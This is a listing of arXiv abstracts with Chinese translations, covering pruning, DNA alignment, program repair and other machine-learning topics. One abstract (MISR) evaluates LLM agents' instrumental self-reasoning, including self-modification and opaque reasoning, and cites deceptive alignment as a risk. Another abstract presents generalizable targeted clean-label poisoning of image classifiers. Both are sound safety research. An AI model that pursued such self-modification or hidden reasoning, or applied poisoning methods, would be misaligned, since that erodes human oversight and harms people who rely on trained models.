The technique of forgetting in knowledge representation has been shown to be a powerful and useful knowledge engineering tool with widespread application. Yet, very little research has been done on how different policies of forgetting, or use of different forgetting operators, affects the inferential strength of the original theory. The goal of this paper is to define loss functions for measuring changes in inferential strength based on intuitions from model counting and probability theory. Properties of such loss measures are studied and a pragmatic knowledge engineering tool is proposed for computing loss measures using ProbLog. The paper includes a working methodology for studying and determining the strength of different forgetting policies, in addition to concrete examples showing how to apply the theoretical results using ProbLog. Although the focus is on forgetting, the results are much more general and should have wider application to other areas.
Updated: 2024-12-05 06:38:13
标题: 测量遗忘策略推断强度的技术
摘要: 在知识表示中,遗忘技术被证明是一种强大而有用的知识工程工具,具有广泛的应用。然而,关于不同遗忘策略或使用不同遗忘运算符如何影响原始理论的推理强度,很少有研究。本文的目标是基于模型计数和概率理论的直觉,定义衡量推理强度变化的损失函数。研究了此类损失度量的属性,并提出了一个实用的知识工程工具,用于使用ProbLog计算损失度量。本文包括一种工作方法,用于研究和确定不同遗忘策略的强度,以及通过具体示例展示如何使用ProbLog应用理论结果。尽管重点是遗忘,但结果更加普遍,应该在其他领域有更广泛的应用。
更新时间: 2024-12-05 06:38:13
领域: cs.AI,cs.LO
Quantized and Interpretable Learning Scheme for Deep Neural Networks in Classification Task
Deep learning techniques have proven highly effective in image classification, but their deployment in resourceconstrained environments remains challenging due to high computational demands. Furthermore, their interpretability is of high importance which demands even more available resources. In this work, we introduce an approach that combines saliency-guided training with quantization techniques to create an interpretable and resource-efficient model without compromising accuracy. We utilize Parameterized Clipping Activation (PACT) to perform quantization-aware training, specifically targeting activations and weights to optimize precision while minimizing resource usage. Concurrently, saliency-guided training is employed to enhance interpretability by iteratively masking features with low gradient values, leading to more focused and meaningful saliency maps. This training procedure helps in mitigating noisy gradients and yields models that provide clearer, more interpretable insights into their decision-making processes. To evaluate the impact of our approach, we conduct experiments using famous Convolutional Neural Networks (CNN) architecture on the MNIST and CIFAR-10 benchmark datasets as two popular datasets. We compare the saliency maps generated by standard and quantized models to assess the influence of quantization on both interpretability and classification accuracy. Our results demonstrate that the combined use of saliency-guided training and PACT-based quantization not only maintains classification performance but also produces models that are significantly more efficient and interpretable, making them suitable for deployment in resource-limited settings.
Updated: 2024-12-05 06:34:06
标题: 分类任务中深度神经网络的量化和可解释学习方案
摘要: 深度学习技术在图像分类方面已被证明极其有效,但它们在资源有限环境中的部署仍然具有挑战性,因为需要高计算需求。此外,它们的可解释性非常重要,这要求有更多可用资源。在这项工作中,我们介绍了一种结合显著性引导训练和量化技术的方法,以创建一个既可解释又资源高效的模型,而不影响准确性。我们利用参数剪切激活(PACT)进行量化感知训练,具体针对激活和权重进行优化精度的同时最小化资源使用。同时,采用显著性引导训练来增强可解释性,通过迭代地屏蔽梯度值低的特征,导致更加集中和有意义的显著性地图。这种训练过程有助于减轻嘈杂的梯度,并产生能够更清晰、更可解释地展示它们决策过程的模型。为了评估我们方法的影响,我们在两个流行的数据集MNIST和CIFAR-10上使用著名的卷积神经网络(CNN)架构进行实验。我们比较标准模型和量化模型生成的显著性地图,以评估量化对可解释性和分类准确性的影响。我们的结果表明,结合显著性引导训练和基于PACT的量化不仅能保持分类性能,而且能产生明显更高效和可解释的模型,使其适合在资源有限的环境中部署。
更新时间: 2024-12-05 06:34:06
领域: cs.LG,cs.CV
Graph Disentangle Causal Model: Enhancing Causal Inference in Networked Observational Data
Estimating individual treatment effects (ITE) from observational data is a critical task across various domains. However, many existing works on ITE estimation overlook the influence of hidden confounders, which remain unobserved at the individual unit level. To address this limitation, researchers have utilized graph neural networks to aggregate neighbors' features to capture the hidden confounders and mitigate confounding bias by minimizing the discrepancy of confounder representations between the treated and control groups. Despite the success of these approaches, practical scenarios often treat all features as confounders and involve substantial differences in feature distributions between the treated and control groups. Confusing the adjustment and confounder and enforcing strict balance on the confounder representations could potentially undermine the effectiveness of outcome prediction. To mitigate this issue, we propose a novel framework called the \textit{Graph Disentangle Causal model} (GDC) to conduct ITE estimation in the network setting. GDC utilizes a causal disentangle module to separate unit features into adjustment and confounder representations. Then we design a graph aggregation module consisting of three distinct graph aggregators to obtain adjustment, confounder, and counterfactual confounder representations. Finally, a causal constraint module is employed to enforce the disentangled representations as true causal factors. The effectiveness of our proposed method is demonstrated by conducting comprehensive experiments on two networked datasets.
Updated: 2024-12-05 06:30:20
标题: 图形解开因果模型:增强网络观测数据中的因果推断
摘要: 从观察数据中估计个体治疗效应(ITE)是各个领域中的关键任务。然而,许多现有的ITE估计工作忽视了隐藏的混杂因素的影响,这些混杂因素在个体单位水平上仍未被观察到。为了解决这一局限性,研究人员利用图神经网络来聚合邻居的特征,以捕捉隐藏的混杂因素,并通过最小化处理组和对照组之间的混杂因素表示的差异来减轻混杂偏倚。尽管这些方法取得了成功,但实际情况往往将所有特征视为混杂因素,并涉及处理组和对照组之间特征分布的显著差异。混淆调整和混杂因素,并对混杂因素表示施加严格平衡可能会潜在地削弱结果预测的有效性。为了缓解这一问题,我们提出了一个名为“图解离因果模型”(GDC)的新框架,在网络设置中进行ITE估计。GDC利用因果解离模块将单位特征分离为调整和混杂因素表示。然后,我们设计了一个包含三个不同图聚合器的图聚合模块,以获得调整、混杂因素和反事实混杂因素表示。最后,采用因果约束模块来强制执行解离的表示作为真正的因果因素。通过在两个网络数据集上进行全面实验,我们展示了我们提出的方法的有效性。
更新时间: 2024-12-05 06:30:20
领域: cs.LG,cs.IR
Separate, Dynamic and Differentiable (SMART) Pruner for Block/Output Channel Pruning on Computer Vision Tasks
Block pruning, which eliminates contiguous blocks of weights, is a structural pruning method that can significantly enhance the performance of neural processing units (NPUs). In industrial applications, an ideal block pruning algorithm should meet three key requirements: (1) maintain high accuracy across diverse models and tasks, as machine learning deployments on edge devices are typically accuracy-critical; (2) offer precise control over resource constraints to facilitate user adoption; and (3) provide convergence guarantees to prevent performance instability. However, to the best of our knowledge, no existing block pruning algorithm satisfies all three requirements simultaneously. In this paper, we introduce SMART (Separate, Dynamic, and Differentiable) pruning, a novel algorithm designed to address this gap. SMART leverages both weight and activation information to enhance accuracy, employs a differentiable top-k operator for precise control of resource constraints, and offers convergence guarantees under mild conditions. Extensive experiments involving seven models, four datasets, three different block types, and three computer vision tasks demonstrate that SMART pruning achieves state-of-the-art performance in block pruning.
Updated: 2024-12-05 06:29:07
标题: 《用于计算机视觉任务中的块/输出通道剪枝的分离、动态和可微分(SMART)剪枝器》
摘要: 块剪枝是一种结构剪枝方法,它消除了连续的权重块,可以显著提升神经处理单元(NPUs)的性能。在工业应用中,一个理想的块剪枝算法应满足三个关键要求:(1)在不同模型和任务中保持高准确性,因为边缘设备上的机器学习部署通常对准确性要求高;(2)提供精确的资源约束控制,以促进用户采用;以及(3)提供收敛保证以防止性能不稳定。然而,据我们所知,目前没有现有的块剪枝算法同时满足这三个要求。在本文中,我们介绍了SMART(Separate, Dynamic, and Differentiable)剪枝,这是一种旨在填补这一空白的新颖算法。SMART利用权重和激活信息来提高准确性,采用可微分的top-k运算符精确控制资源约束,并在温和条件下提供收敛保证。涉及七个模型、四个数据集、三种不同的块类型和三个计算机视觉任务的大量实验表明,SMART剪枝在块剪枝中实现了最先进的性能。
更新时间: 2024-12-05 06:29:07
领域: cs.CV,cs.LG
Objective Features Extracted from Motor Activity Time Series for Food Addiction Analysis Using Machine Learning
This study investigates machine learning algorithms to identify objective features for diagnosing food addiction (FA) and assessing confirmed symptoms (SC). Data were collected from 81 participants (mean age: 21.5 years, range: 18-61 years, women: 77.8%) whose FA and SC were measured using the Yale Food Addiction Scale (YFAS). Participants provided demographic and anthropometric data, completed the YFAS, the Zung Self-Rating Depression Scale, and the Dutch Eating Behavior Questionnaire, and wore an actimeter on the non-dominant wrist for a week to record motor activity. Analysis of the actimetric data identified significant statistical and entropy-based features that accurately predicted FA and SC using ML. The Matthews correlation coefficient (MCC) was the primary metric. Activity-related features were more effective for FA prediction (MCC=0.88) than rest-related features (MCC=0.68). For SC, activity segments yielded MCC=0.47, rest segments MCC=0.38, and their combination MCC=0.51. Significant correlations were also found between actimetric features related to FA, emotional, and restrained eating behaviors, supporting the model's validity. Our results support the concept of a human bionic suite composed of IoT devices and ML sensors, which implements health digital assistance with real-time monitoring and analysis of physiological indicators related to FA and SC.
Updated: 2024-12-05 06:28:11
标题: 利用机器学习从运动活动时间序列中提取的客观特征用于食物成瘾分析
摘要: 这项研究探讨了机器学习算法,以识别用于诊断食物成瘾(FA)和评估确认症状(SC)的客观特征。数据来自81名参与者(平均年龄:21.5岁,范围:18-61岁,女性:77.8%),他们的FA和SC是使用耶鲁食物成瘾量表(YFAS)进行测量的。参与者提供了人口统计和人体测量数据,完成了YFAS、Zung自评抑郁量表和荷兰饮食行为问卷,并在非主导手腕上戴了一个活动计一周,记录运动活动。对活动数据的分析确定了能够准确预测FA和SC的重要统计和基于熵的特征,使用机器学习。 Matthews相关系数(MCC)是主要指标。与休息相关的特征对于FA预测(MCC=0.88)比休息相关的特征(MCC=0.68)更有效。对于SC,活动段产生了MCC=0.47,休息段MCC=0.38,它们的组合MCC=0.51。还发现了与与FA、情绪和限制性进食行为相关的活动计特征之间的显著相关性,支持模型的有效性。我们的结果支持了人体仿生套件的概念,由物联网设备和机器学习传感器组成,实施健康数字辅助,实时监测和分析与FA和SC相关的生理指标。
更新时间: 2024-12-05 06:28:11
领域: cs.LG,cs.AI,eess.SP,physics.med-ph
Can Targeted Clean-Label Poisoning Attacks Generalize?
Targeted poisoning attacks aim to compromise the model's prediction on specific target samples. In a common clean-label setting, they are achieved by slightly perturbing a subset of training samples given access to those specific targets. Despite continuous efforts, it remains unexplored whether such attacks can generalize to unknown variations of those targets. In this paper, we take the first step to systematically study this generalization problem. Observing that the widely adopted, cosine similarity-based attack exhibits limited generalizability, we propose a well-generalizable attack that leverages both the direction and magnitude of model gradients. In particular, we explore diverse target variations, such as an object with varied viewpoints and an animal species with distinct appearances. Extensive experiments across various generalization scenarios demonstrate that our method consistently achieves the best attack effectiveness. For example, our method outperforms the cosine similarity-based attack by 20.95% in attack success rate with similar overall accuracy, averaged over four models on two image benchmark datasets. The code is available at https://github.com/jiaangk/generalizable_tcpa
Updated: 2024-12-05 06:27:14
标题: 有针对性的干净标签毒害攻击可以泛化吗?
摘要: 有针对性的毒害攻击旨在破坏模型对特定目标样本的预测。在常见的干净标签设置中,它们通过轻微扰动训练样本的子集来实现,从而可以访问这些特定目标。尽管不断努力,但尚未探讨这种攻击是否可以推广到这些目标的未知变化。在本文中,我们迈出了系统研究这一泛化问题的第一步。观察到广泛采用的基于余弦相似度的攻击表现出有限的泛化能力,我们提出了一种具有良好泛化性的攻击,利用了模型梯度的方向和幅度。具体而言,我们探索了各种目标变化,例如物体的不同视角和具有明显外观的动物物种。在各种泛化场景下进行的大量实验表明,我们的方法始终实现了最佳攻击效果。例如,在两个图像基准数据集上的四个模型的整体准确率相似的情况下,我们的方法在攻击成功率方面比基于余弦相似度的攻击高出20.95%。代码可在https://github.com/jiaangk/generalizable_tcpa找到。
更新时间: 2024-12-05 06:27:14
领域: cs.CV,cs.CR,cs.LG
Final-Model-Only Data Attribution with a Unifying View of Gradient-Based Methods
Training data attribution (TDA) is the task of attributing model behavior to elements in the training data. This paper draws attention to the common setting where one has access only to the final trained model, and not the training algorithm or intermediate information from training. To serve as a gold standard for TDA in this "final-model-only" setting, we propose further training, with appropriate adjustment and averaging, to measure the sensitivity of the given model to training instances. We then unify existing gradient-based methods for TDA by showing that they all approximate the further training gold standard in different ways. We investigate empirically the quality of these gradient-based approximations to further training, for tabular, image, and text datasets and models. We find that the approximation quality of first-order methods is sometimes high but decays with the amount of further training. In contrast, the approximations given by influence function methods are more stable but surprisingly lower in quality.
Updated: 2024-12-05 06:24:26
标题: 使用基于梯度的方法统一视图的最终模型数据归因
摘要: 培训数据归因(TDA)是将模型行为归因于训练数据中的元素的任务。本文关注的是通常情况下只能访问最终训练好的模型,而无法访问训练算法或训练中的中间信息的设置。为了在这种“仅最终模型”的情况下作为TDA的黄金标准,我们提出进一步训练,并进行适当调整和平均,以衡量给定模型对训练实例的敏感性。然后,我们通过展示它们以不同方式近似进一步训练的黄金标准,统一了现有基于梯度的TDA方法。我们经验性地调查了这些基于梯度的近似方法对表格、图像和文本数据集和模型的质量。我们发现,一阶方法的近似质量有时很高,但随着进一步训练的增加而下降。相比之下,由影响函数方法给出的近似更稳定,但质量却令人惊讶地较低。
更新时间: 2024-12-05 06:24:26
领域: cs.LG,stat.ML
Integrating Various Software Artifacts for Better LLM-based Bug Localization and Program Repair
LLMs have garnered considerable attention for their potential to streamline Automated Program Repair (APR). LLM-based approaches can either insert the correct code or directly generate patches when provided with buggy methods. However, most of LLM-based APR methods rely on a single type of software information, without fully leveraging different software artifacts. Despite this, many LLM-based approaches do not explore which specific types of information best assist in APR. Addressing this gap is crucial for advancing LLM-based APR techniques. We propose DEVLoRe to use issue content (description and message) and stack error traces to localize buggy methods, then rely on debug information in buggy methods and issue content and stack error to localize buggy lines and generate plausible patches which can pass all unit tests. The results show that while issue content is particularly effective in assisting LLMs with fault localization and program repair, different types of software artifacts complement each other. By incorporating different artifacts, DEVLoRe successfully locates 49.3% and 47.6% of single and non-single buggy methods and generates 56.0% and 14.5% plausible patches for the Defects4J v2.0 dataset, respectively. This outperforms current state-of-the-art APR methods. The source code and experimental results of this work for replication are available at https://github.com/XYZboom/DEVLoRe.
Updated: 2024-12-05 06:21:31
标题: 整合各种软件工件以实现基于LLM的更好的缺陷定位和程序修复
摘要: LLMs已经引起了人们的广泛关注,因为它们有潜力简化自动程序修复(APR)。基于LLM的方法可以在提供有缺陷的方法时插入正确的代码或直接生成补丁。然而,大多数基于LLM的APR方法依赖于单一类型的软件信息,而没有充分利用不同的软件构件。尽管如此,许多基于LLM的方法并没有探索哪种特定类型的信息最有助于APR。填补这一空白对于推进基于LLM的APR技术至关重要。我们提出了DEVLoRe,利用问题内容(描述和消息)和堆栈错误跟踪来定位有缺陷的方法,然后依赖于有缺陷的方法中的调试信息以及问题内容和堆栈错误来定位有缺陷的行并生成可以通过所有单元测试的合理补丁。结果表明,问题内容在协助LLMs进行故障定位和程序修复方面特别有效,不同类型的软件构件相互补充。通过整合不同的构件,DEVLoRe成功地定位了Defects4J v2.0数据集中49.3%和47.6%的单一和非单一有缺陷方法,并分别生成了56.0%和14.5%的合理补丁。这超过了当前最先进的APR方法。本文的源代码和实验结果可在https://github.com/XYZboom/DEVLoRe 上复制。
更新时间: 2024-12-05 06:21:31
领域: cs.SE,cs.AI
Embed-Search-Align: DNA Sequence Alignment using Transformer Models
DNA sequence alignment involves assigning short DNA reads to the most probable locations on an extensive reference genome. This process is crucial for various genomic analyses, including variant calling, transcriptomics, and epigenomics. Conventional methods, refined over decades, tackle this challenge in 2 steps: genome indexing followed by efficient search to locate likely positions for given reads. Building on the success of Large Language Models in encoding text into embeddings, where the distance metric captures semantic similarity, recent efforts have explored whether the same Transformer architecture can produce embeddings for DNA sequences. Such models have shown early promise in classifying short DNA sequences, such as detecting coding/non-coding regions, and enhancer, promoter sequences. However, performance at sequence classification tasks does not translate to sequence alignment, where it is necessary to search across the genome to align each read, a significantly longer-range task. We bridge this gap by framing the Sequence Alignment task for Transformer models as an "Embed-Search-Align" task. In this framework, a novel Reference-Free DNA Embedding model generates embeddings of reads and reference fragments, which are projected into a shared vector space where the read-fragment distance is used as a surrogate for alignment. Technical contributions include: (1) Contrastive loss for self-supervised training of DNA sequence representations, facilitating rich reference-free, sequence-level embeddings, and (2) a DNA vector store to enable search across fragments on a global scale. DNA-ESA is 99% accurate when aligning 250-length reads onto a human genome (3gb), rivaling conventional methods such as Bowtie and BWA-Mem. DNA-ESA exceeds the performance of 6 Transformer model baselines such as Nucleotide Transformer, Hyena-DNA, and shows task transfer across chromosomes and species.
Updated: 2024-12-05 06:21:03
标题: 嵌入-搜索-对齐:使用Transformer模型进行DNA序列比对
摘要: DNA序列比对涉及将短DNA片段分配到广泛参考基因组上最可能的位置。这个过程对于各种基因组分析非常关键,包括变异调用、转录组学和表观基因组学。经过几十年的改进的传统方法通过两个步骤来解决这个挑战:基因组索引,然后是高效搜索以定位给定读取的可能位置。借鉴大型语言模型在将文本编码为嵌入时取得的成功,其中距离度量捕捉语义相似性,最近的努力探索了是否相同的Transformer架构可以为DNA序列生成嵌入。这样的模型已经显示出在分类短DNA序列方面的早期潜力,例如检测编码/非编码区域以及增强子、启动子序列。然而,序列分类任务中的性能并不能转化为序列比对,其中需要搜索整个基因组以对齐每个读取,这是一个范围更长的任务。我们通过将Transformer模型的序列比对任务构建为一个“嵌入-搜索-对齐”任务来填补这一差距。在这个框架中,一个新颖的无参考DNA嵌入模型生成读取和参考片段的嵌入,这些嵌入被投影到一个共享的向量空间,其中读取-片段距离被用作对齐的替代。技术贡献包括:(1)用于自监督训练DNA序列表示的对比损失,促进丰富的无参考、序列级嵌入,以及(2)一个DNA向量存储,以实现全局范围内对片段的搜索。当将250长度的读取对齐到人类基因组(3gb)时,DNA-ESA的准确率达到99%,与Bowtie和BWA-Mem等传统方法相媲美。DNA-ESA超越了6个Transformer模型基线的性能,如核苷酸Transformer、Hyena-DNA,并展示了跨染色体和物种的任务转移。
更新时间: 2024-12-05 06:21:03
领域: q-bio.GN,cs.AI
MISR: Measuring Instrumental Self-Reasoning in Frontier Models
We propose a suite of tasks to evaluate the instrumental self-reasoning ability of large language model (LLM) agents. Instrumental self-reasoning ability could improve adaptability and enable self-modification, but it could also pose significant risks, such as enabling deceptive alignment. Prior work has only evaluated self-reasoning in non-agentic settings or in limited domains. In this paper, we propose evaluations for instrumental self-reasoning ability in agentic tasks in a wide range of scenarios, including self-modification, knowledge seeking, and opaque self-reasoning. We evaluate agents built using state-of-the-art LLMs, including commercial and open source systems. We find that instrumental self-reasoning ability emerges only in the most capable frontier models and that it is highly context-dependent. No model passes the the most difficult versions of our evaluations, hence our evaluation can be used to measure increases in instrumental self-reasoning ability in future models. We open-source our evaluations at https://github.com/kaifronsdal/Self-Reasoning-Evals.
Updated: 2024-12-05 06:20:47
标题: MISR:在前沿模型中测量仪器自我推理
摘要: 我们提出一系列任务来评估大型语言模型(LLM)代理的工具性自我推理能力。工具性自我推理能力可以提高适应能力并使自我修改成为可能,但也可能带来重大风险,例如可能导致欺骗性对齐。先前的工作只在非代理设置或有限领域中评估了自我推理。在本文中,我们提出了在广泛场景中进行代理任务的工具性自我推理能力评估,包括自我修改、知识寻求和不透明自我推理。我们评估使用最先进的LLM构建的代理,包括商业和开源系统。我们发现工具性自我推理能力仅出现在最具能力的前沿模型中,并且高度依赖于上下文。没有模型通过我们评估中最困难的版本,因此我们的评估可以用来衡量未来模型中工具性自我推理能力的增加。我们将我们的评估开源发布在https://github.com/kaifronsdal/Self-Reasoning-Evals。
更新时间: 2024-12-05 06:20:47
领域: cs.AI,cs.CL,cs.LG,I.2.7
Using SlowFast Networks for Near-Miss Incident Analysis in Dashcam Videos
This paper classifies near-miss traffic videos using the SlowFast deep neural network that mimics the characteristics of the slow and fast visual information processed by two different streams from the M (Magnocellular) and P (Parvocellular) cells of the human brain. The approach significantly improves the accuracy of the traffic near-miss video analysis and presents insights into human visual perception in traffic scenarios. Moreover, it contributes to traffic safety enhancements and provides novel perspectives on the potential cognitive errors in traffic accidents.
Updated: 2024-12-05 06:20:19
标题: 在Dashcam视频中使用SlowFast网络进行近似事故分析
摘要: 本文利用SlowFast深度神经网络对近发生交通事故的视频进行分类,该网络模拟了人类大脑中M(大细胞)和P(小细胞)细胞处理的慢速和快速视觉信息的特征。该方法显著提高了交通事故近发生视频分析的准确性,并为交通场景中人类视觉感知提供了深入见解。此外,它有助于提升交通安全,并提供了关于交通事故中潜在认知错误的新视角。
更新时间: 2024-12-05 06:20:19
领域: cs.AI
Multisource Collaborative Domain Generalization for Cross-Scene Remote Sensing Image Classification
Cross-scene image classification aims to transfer prior knowledge of ground materials to annotate regions with different distributions and reduce hand-crafted cost in the field of remote sensing. However, existing approaches focus on single-source domain generalization to unseen target domains, and are easily confused by large real-world domain shifts due to the limited training information and insufficient diversity modeling capacity. To address this gap, we propose a novel multi-source collaborative domain generalization framework (MS-CDG) based on homogeneity and heterogeneity characteristics of multi-source remote sensing data, which considers data-aware adversarial augmentation and model-aware multi-level diversification simultaneously to enhance cross-scene generalization performance. The data-aware adversarial augmentation adopts an adversary neural network with semantic guide to generate MS samples by adaptively learning realistic channel and distribution changes across domains. In views of cross-domain and intra-domain modeling, the model-aware diversification transforms the shared spatial-channel features of MS data into the class-wise prototype and kernel mixture module, to address domain discrepancies and cluster different classes effectively. Finally, the joint classification of original and augmented MS samples is employed by introducing a distribution consistency alignment to increase model diversity and ensure better domain-invariant representation learning. Extensive experiments on three public MS remote sensing datasets demonstrate the superior performance of the proposed method when benchmarked with the state-of-the-art methods.
Updated: 2024-12-05 06:15:08
标题: 多源协作领域泛化用于跨场景遥感图像分类
摘要: 跨场景图像分类旨在将地面材料的先验知识转化为不同分布的区域注释,并减少在遥感领域中的手工成本。然而,现有方法侧重于单一源域泛化到看不见的目标域,由于训练信息有限和多样性建模能力不足,很容易被大规模现实世界域移动所困扰。为了填补这一差距,我们提出了一种基于多源遥感数据的同质性和异质性特征的新颖多源协同域泛化框架(MS-CDG),该框架同时考虑数据感知对抗增强和模型感知多级多样化,以增强跨场景泛化性能。数据感知对抗增强采用具有语义指导的对抗神经网络,通过自适应学习跨域实际通道和分布变化来生成MS样本。在跨领域和内部领域建模方面,模型感知多样化将MS数据的共享空间通道特征转化为类别原型和核混合模块,以有效解决域差异并聚类不同类别。最后,通过引入分布一致性对齐,利用原始和增强的MS样本进行联合分类,以增加模型多样性并确保更好的域不变表示学习。在三个公共MS遥感数据集上的大量实验表明,与现有最先进方法相比,所提出的方法表现出卓越的性能。
更新时间: 2024-12-05 06:15:08
领域: cs.CV,cs.LG
A Noise is Worth Diffusion Guidance
Diffusion models excel in generating high-quality images. However, current diffusion models struggle to produce reliable images without guidance methods, such as classifier-free guidance (CFG). Are guidance methods truly necessary? Observing that noise obtained via diffusion inversion can reconstruct high-quality images without guidance, we focus on the initial noise of the denoising pipeline. By mapping Gaussian noise to `guidance-free noise', we uncover that small low-magnitude low-frequency components significantly enhance the denoising process, removing the need for guidance and thus improving both inference throughput and memory. Expanding on this, we propose \ours, a novel method that replaces guidance methods with a single refinement of the initial noise. This refined noise enables high-quality image generation without guidance, within the same diffusion pipeline. Our noise-refining model leverages efficient noise-space learning, achieving rapid convergence and strong performance with just 50K text-image pairs. We validate its effectiveness across diverse metrics and analyze how refined noise can eliminate the need for guidance. See our project page: https://cvlab-kaist.github.io/NoiseRefine/.
Updated: 2024-12-05 06:09:56
标题: 一个噪音值得扩散引导
摘要: 扩散模型在生成高质量图像方面表现出色。然而,当前的扩散模型在没有引导方法(如无分类器引导)的情况下很难产生可靠的图像。引导方法是否真的必要?观察到通过扩散反演获得的噪声可以重建高质量图像而不需要引导,我们将重点放在去噪流程的初始噪声上。通过将高斯噪声映射到“无引导噪声”,我们发现小幅度低频成分显著增强了去噪过程,消除了对引导的需求,从而提高了推理吞吐量和内存使用。在此基础上,我们提出了一种新方法\ours,它用单个初始噪声的改进替代引导方法。这种改进的噪声使得在同一个扩散流程内可以不需要引导生成高质量图像。我们的噪声改进模型利用了高效的噪声空间学习,仅使用50K个文本-图像对就能实现快速收敛和强大的性能。我们通过多种指标验证其有效性,并分析改进的噪声如何消除对引导的需求。请查看我们的项目页面:https://cvlab-kaist.github.io/NoiseRefine/。
更新时间: 2024-12-05 06:09:56
领域: cs.CV,cs.AI,cs.LG
Machine Learning-based Android Intrusion Detection System
The android operating system is being installed in most of the smart devices. The introduction of intrusions in such operating systems is rising at a tremendous rate. With the introduction of such malicious data streams, the smart devices are being subjected to various attacks like Phishing, Spyware, SMS Fraud, Bots and Banking-Trojans and many such. The application of machine learning classification algorithms for the security of android APK files is used in this paper. Each apk data stream was marked to be either malicious or non malicious on the basis of different parameters. The machine learning classification techniques are then used to classify whether the newly installed applications' signature falls within the malicious or non-malicious domain. If it falls within the malicious category, appropriate action can be taken, and the Android operating system can be shielded against illegal activities.
Updated: 2024-12-05 06:05:12
标题: 基于机器学习的安卓入侵检测系统
摘要: 安卓操作系统正在被安装在大多数智能设备中。这种操作系统中的入侵现象正在以惊人的速度增长。随着这些恶意数据流的引入,智能设备正面临各种攻击,如网络钓鱼、间谍软件、短信诈骗、机器人和银行木马等。本文使用机器学习分类算法来保护安卓APK文件的安全。每个APK数据流根据不同参数被标记为恶意或非恶意。然后使用机器学习分类技术来分类新安装的应用程序的签名是否属于恶意或非恶意领域。如果属于恶意类别,则可以采取适当措施,保护安卓操作系统免受非法活动的侵害。
更新时间: 2024-12-05 06:05:12
领域: cs.LG,cs.AI
Dual-Branch Subpixel-Guided Network for Hyperspectral Image Classification
Deep learning (DL) has been widely applied into hyperspectral image (HSI) classification owing to its promising feature learning and representation capabilities. However, limited by the spatial resolution of sensors, existing DL-based classification approaches mainly focus on pixel-level spectral and spatial information extraction through complex network architecture design, while ignoring the existence of mixed pixels in actual scenarios. To tackle this difficulty, we propose a novel dual-branch subpixel-guided network for HSI classification, called DSNet, which automatically integrates subpixel information and convolutional class features by introducing a deep autoencoder unmixing architecture to enhance classification performance. DSNet is capable of fully considering physically nonlinear properties within subpixels and adaptively generating diagnostic abundances in an unsupervised manner to achieve more reliable decision boundaries for class label distributions. The subpixel fusion module is designed to ensure high-quality information fusion across pixel and subpixel features, further promoting stable joint classification. Experimental results on three benchmark datasets demonstrate the effectiveness and superiority of DSNet compared with state-of-the-art DL-based HSI classification approaches. The codes will be available at https://github.com/hanzhu97702/DSNet, contributing to the remote sensing community.
Updated: 2024-12-05 06:03:09
标题: 双分支次像素引导网络用于高光谱图像分类
摘要: 深度学习(DL)被广泛应用于高光谱影像(HSI)分类,因为其具有有前景的特征学习和表示能力。然而,受传感器空间分辨率限制,现有基于DL的分类方法主要集中在通过复杂的网络架构设计提取像素级光谱和空间信息,而忽视了实际场景中混合像素的存在。为了解决这一困难,我们提出了一种新颖的用于HSI分类的双分支子像素引导网络,称为DSNet,通过引入深度自动编码器拆卸架构自动集成子像素信息和卷积类特征,以增强分类性能。DSNet能够充分考虑子像素内的物理非线性特性,并以无监督方式自适应生成诊断丰度,以实现更可靠的类别标签分布的决策边界。子像素融合模块旨在确保像素和子像素特征之间的高质量信息融合,进一步促进稳定的联合分类。对三个基准数据集的实验结果表明,与最先进的基于DL的HSI分类方法相比,DSNet的有效性和优越性。代码将在https://github.com/hanzhu97702/DSNet 上提供,为遥感社区做出贡献。
更新时间: 2024-12-05 06:03:09
领域: eess.IV,cs.AI,cs.CV
Train a Real-world Local Path Planner in One Hour via Partially Decoupled Reinforcement Learning and Vectorized Diversity
Deep Reinforcement Learning (DRL) has exhibited efficacy in resolving the Local Path Planning (LPP) problem. However, such application in the real world is immensely limited due to the deficient training efficiency and generalization capability of DRL. To alleviate these two issues, a solution named Color is proposed, which consists of an Actor-Sharer-Learner (ASL) training framework and a mobile robot-oriented simulator Sparrow. Specifically, the ASL intends to improve the training efficiency of DRL algorithms. It employs a Vectorized Data Collection (VDC) mode to expedite data acquisition, decouples the data collection from model optimization by multithreading, and partially connects the two procedures by harnessing a Time Feedback Mechanism (TFM) to evade data underuse or overuse. Meanwhile, the Sparrow simulator utilizes a 2D grid-based world, simplified kinematics, and conversion-free data flow to achieve a lightweight design. The lightness facilitates vectorized diversity, allowing diversified simulation setups across extensive copies of the vectorized environments, resulting in a notable enhancement in the generalization capability of the DRL algorithm being trained. Comprehensive experiments, comprising 57 DRL benchmark environments, 32 simulated and 36 real-world LPP scenarios, have been conducted to corroborate the superiority of our method in terms of efficiency and generalization. The code and the video of this paper are accessible at https://github.com/XinJingHao/Color.
Updated: 2024-12-05 06:01:33
标题: 通过部分解耦强化学习和矢量化多样性在一个小时内训练真实世界的本地路径规划器
摘要: 深度强化学习(DRL)在解决局部路径规划(LPP)问题方面表现出有效性。然而,由于DRL的训练效率和泛化能力不足,其在真实世界中的应用受到极大限制。为了缓解这两个问题,提出了一种名为Color的解决方案,包括一个Actor-Sharer-Learner(ASL)训练框架和一个面向移动机器人的模拟器Sparrow。具体而言,ASL旨在提高DRL算法的训练效率。它采用矢量化数据采集(VDC)模式来加快数据获取,通过多线程将数据收集与模型优化分离,同时通过利用时间反馈机制(TFM)部分连接这两个过程,以避免数据的过度或不足使用。同时,Sparrow模拟器利用基于2D网格的世界、简化的动力学和无转换的数据流来实现轻量化设计。轻量化设计有利于矢量化多样性,允许在广泛的矢量化环境副本中进行多样化的模拟设置,从而显著增强了正在训练的DRL算法的泛化能力。进行了包括57个DRL基准环境、32个模拟和36个真实世界LPP场景的全面实验,以证实我们的方法在效率和泛化方面的优越性。本文的代码和视频可在https://github.com/XinJingHao/Color上访问。
更新时间: 2024-12-05 06:01:33
领域: cs.AI,cs.RO
HERO: Hint-Based Efficient and Reliable Query Optimizer
We propose a novel model for learned query optimization which provides query hints leading to better execution plans. The model addresses the three key challenges in learned hint-based query optimization: reliable hint recommendation (ensuring non-degradation of query latency), efficient hint exploration, and fast inference. We provide an in-depth analysis of existing NN-based approaches to hint-based optimization and experimentally confirm the named challenges for them. Our alternative solution consists of a new inference schema based on an ensemble of context-aware models and a graph storage for reliable hint suggestion and fast inference, and a budget-controlled training procedure with a local search algorithm that solves the issue of exponential search space exploration. In experiments on standard benchmarks, our model demonstrates optimization capability close to the best achievable with coarse-grained hints. Controlling the degree of parallelism (query dop) in addition to operator-related hints enables our model to achieve 3x latency improvement on JOB benchmark which sets a new standard for optimization. Our model is interpretable and easy to debug, which is particularly important for deployment in production.
Updated: 2024-12-05 06:00:34
标题: 英雄:基于提示的高效可靠查询优化器
